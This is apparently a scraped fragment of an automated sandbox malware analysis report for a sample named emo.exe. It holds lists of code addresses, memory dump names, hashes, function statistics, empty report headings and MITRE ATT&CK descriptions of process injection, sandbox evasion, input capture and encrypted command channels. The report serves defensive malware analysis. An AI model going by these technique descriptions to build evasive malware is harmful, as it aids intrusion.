0x02d66172
0x02d66180
0x02d66185
0x02d66189
0x02d6618c
0x02d661a4
0x02d6618e
0x02d66191
0x02d66195
0x02d66198
0x02d6619a
0x02d6619d
0x02d661a0
0x02d661a0
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661a7
0x02d661ac
0x02d661af
0x02d661af
0x02d661b1
0x02d661b6
0x02d661b6
0x02d661bb
0x02d660e0
0x02d660e0
0x02d660e7
0x02d660ea
0x02d660f3
0x02d660f9
0x02d660f9
0x02d660fe
0x02d660ff
0x02d66100
0x02d66101
0x02d66101
0x02d66106
0x02d6610f
0x02d66115
0x02d66115
0x02d66115
0x02d66118
0x02d6611a
0x02d6611d
0x02d66125
0x02d66125
0x02d660f3
0x02d660de
0x02d661c3
0x02d661c3
0x02d661c6
0x02d661c7
0x02d661d1
0x02d661d6
0x02d661d6
0x02d661d7
0x02d661db
0x02d663f6
0x02d663f6
0x00000000
0x02d661e1
0x02d661e1
0x02d661e1
0x02d661e3
0x02d661e3
0x02d661e3
0x02d661e6
0x02d661e6
0x02d661ec
0x02d661f1
0x00000000
0x00000000
0x02d661f7
0x02d661fa
0x02d662b2
0x02d662b9
0x02d662c1
0x02d662c6
0x02d662d7
0x00000000
0x02d662e0
0x02d662e0
0x02d662e0
0x02d662e5
0x02d662e7
0x02d662ee
0x02d662f6
0x02d662f9
0x02d662f9
0x02d662c8
0x02d662c8
0x02d662ca
0x02d662cd
0x02d662d2
0x02d662d2
0x02d662fd
0x02d662fd
0x02d662ff
0x02d66301
0x02d66304
0x02d6630a
0x02d6631c
0x02d6631c
0x02d6632c
0x02d6632c
0x02d66333
0x02d66336
0x02d66338
0x02d66360
0x02d6636e
0x02d66371
0x02d66378
0x02d6637b
0x02d6637d
0x02d66381
0x02d66384
0x02d66387
0x02d66393
0x02d66393
0x02d66389
0x02d66389
0x02d66389
0x02d66395
0x02d663a0
0x02d663a9
0x02d663ac
0x02d663ae
0x02d661e3
0x02d661e3
0x00000000
0x02d6633a
0x02d6633a
0x02d6633a
0x02d6633a
0x02d6633d
0x00000000
0x00000000
0x02d66343
0x02d66348
0x02d6634a
0x02d6634b
0x02d6634e
0x02d66350
0x02d66353
0x02d66356
0x02d66359
0x02d6635b
0x00000000
0x02d6635d
0x02d6635d
0x02d6635d
0x00000000
0x02d6635d
0x00000000
0x02d6635b
0x02d665b6
0x02d665b6
0x00000000
0x02d665b6
0x02d6631e
0x02d6631e
0x02d6631e
0x02d66321
0x02d66323
0x02d66698
0x02d66698
0x02d6669b
0x00000000
0x02d66329
0x02d66329
0x02d66329
0x00000000
0x02d66329
0x02d66323
0x02d6630c
0x02d6630c
0x02d6630c
0x02d6630f
0x02d66316
0x00000000
0x02d66316
0x02d66200
0x02d66200
0x02d66208
0x02d6628e
0x02d6628e
0x02d66295
0x02d66298
0x02d6629d
0x02d662a3
0x02d662a6
0x02d662a9
0x02d662a9
0x02d662ac
0x00000000
0x02d6620e
0x02d6620e
0x02d6620e
0x02d66210
0x02d66215
0x02d6621f
0x02d66232
0x02d66232
0x02d66235
0x00000000
0x02d66237
0x02d66237
0x02d6623c
0x02d6623c
0x02d66240
0x02d66240
0x02d6624e
0x02d66259
0x02d6625a
0x02d6625d
0x02d6625f
0x00000000
0x00000000
0x02d66261
0x02d66261
0x02d66264
0x02d66266
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02d66266
0x00000000
0x02d66240
0x02d66221
0x02d66221
0x02d66221
0x02d66226
0x02d66268
0x02d66268
0x02d6626b
0x02d6626e
0x02d665ab
0x02d665ab
0x00000000
0x00000000
0x00000000
0x00000000
0x02d66228
0x02d66228
0x02d6622a
0x02d662af
0x02d662af
0x00000000
0x02d66230
0x02d66230
0x00000000
0x02d66230
0x02d6622a
0x02d66226
0x00000000
0x02d66274
0x02d66277
0x02d66279
0x02d6627b
0x02d6627c
0x02d6627e
0x02d66281
0x02d66284
0x02d66287
0x00000000
0x02d6628c
0x02d66208
0x00000000
0x02d661fa
0x02d663b6
0x02d663b9
0x02d663bc
0x02d663be
0x02d663c0
0x02d666a6
0x02d666a6
0x02d666a9
0x00000000
0x02d663c6
0x02d663c6
0x02d663d2
0x02d663e3
0x02d663e3
0x02d663ed
0x02d663f3
0x00000000
0x02d663f3
0x00000000
0x02d663c0
0x02d661e3
0x02d66686
0x02d66686
0x02d66686
0x02d6668d
0x00000000
0x02d6668d
0x00000000
0x02d66061

APIs

memset.NTDLL ref: 02D65DA8
memset.NTDLL ref: 02D65F7D
memset.NTDLL ref: 02D65F93
memset.NTDLL ref: 02D65FA9

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b735e57e43f559cda6b92a4ed075983c83411ca65ee707fe5e04b97df506d46a
Instruction ID: 5a0a0a34994af751ff04471b6ff85c396c7832742c15ab71b815b7f0a5646b57
Opcode Fuzzy Hash: b735e57e43f559cda6b92a4ed075983c83411ca65ee707fe5e04b97df506d46a
Instruction Fuzzy Hash: 71317EB2E10B82EBE3058F60D805BB4B770FBD9300F105356E4D595642EB78AAA4CBD0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report emo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Code Manipulations

Statistics

Function 041B2000, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeCOMMON

Function 041B1EF0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74
nativeCOMMON

Function 004015E7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 119
threadCOMMON

Function 041D11CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Function 041D2031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Function 041D103C, Relevance: 6.0, APIs: 4, Instructions: 46
synchronizationCOMMON

Function 041B228E, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 14
stringCOMMON

Function 004017C9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89
COMMON

Function 041D1C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Function 041D1C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Function 00401919, Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Function 00401D7A, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Function 041D112C, Relevance: 1.5, APIs: 1, Instructions: 29
synchronizationCOMMON

Function 041DF290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 004013DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Function 041D1A36, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON